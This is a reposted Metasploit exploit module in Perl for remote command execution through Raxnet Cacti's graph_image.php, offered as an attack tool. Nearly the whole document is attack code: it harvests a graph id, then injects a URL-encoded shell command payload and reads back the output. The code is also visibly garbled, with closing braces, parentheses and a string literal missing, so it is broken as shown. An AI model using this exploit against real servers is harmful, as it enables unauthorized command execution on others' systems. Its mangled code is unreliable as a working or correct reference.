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Raxnet Cacti graph_image.php Remote Command Execution Exploit
来源:david.aciejak@yxar.fr 作者:David 发布时间:2005-09-12  

Raxnet Cacti "graph_image.php" Remote Command Execution Exploit

# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.

package Msf::Exploit::cacti_graphimage_exec;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'Cacti graph_image.php Remote Command Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'DIR' => [1, 'DATA', 'Directory of cacti', '/cacti/'],
'SSL' => [0, 'BOOL', 'Use SSL'],

'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in the
Raxnet Cacti threw graph_image.php script. Cacti version to 0.8.6-d are vulnerable.
'Refs' =>
['BID', '14042'],

'Payload' =>
'Space' => 128,
'Keys' => ['cmd','cmd_bash'],

'Keys' => ['cacti'],

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

sub Exploit {
my $self = shift;
my $target_host = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $dir = $self->GetVar('DIR');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $cmd = $encodedPayload->RawPayload;

$cmd = $self->URLEncode($cmd);

my $listgraph = $dir.'graph_view.php?action=list';
my $requestlist =
"GET $listgraph HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: ".$self->VHost.":$target_port\r\n".
"Connection: Close\r\n".

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);

$self->PrintLine("[*] Establishing a connection to the target to get list of valid image id ...");


my $resultslist = $s->Recv(-1, 20);

$resultslist=~m/local_graph_id=(.*?)&/ || $self->PrintLine
("[*] Unable to retrieve a valid image id") && return;

my $valid_graph_id=$1;

$dir = $dir.'graph_image.php?local_graph_id='."$valid_graph_id".'&

my $request =
"GET $dir HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: ".$self->VHost.":$target_port\r\n".
"Connection: Close\r\n".

$s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);

$self->PrintLine("[*] Establishing a connection to the target to execute command ...");


my $results = $s->Recv(-1, 20);

if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){

(undef, $results) = split(/YYY/, $results);

my @results = split ( /\r\n/, $results );

chomp @results;

for (my $i = 2; $i < @results; $i += 2){
} else {

(undef, $results) = split(/YYY/, $results);

my @results = split ( /\r\n/, $results );

chomp @results;
$self->PrintLine("[*] Target may be not vulnerable");


sub URLEncode {
my $self = shift;
my $data = shift;
my $res;

foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
return $res;

sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;


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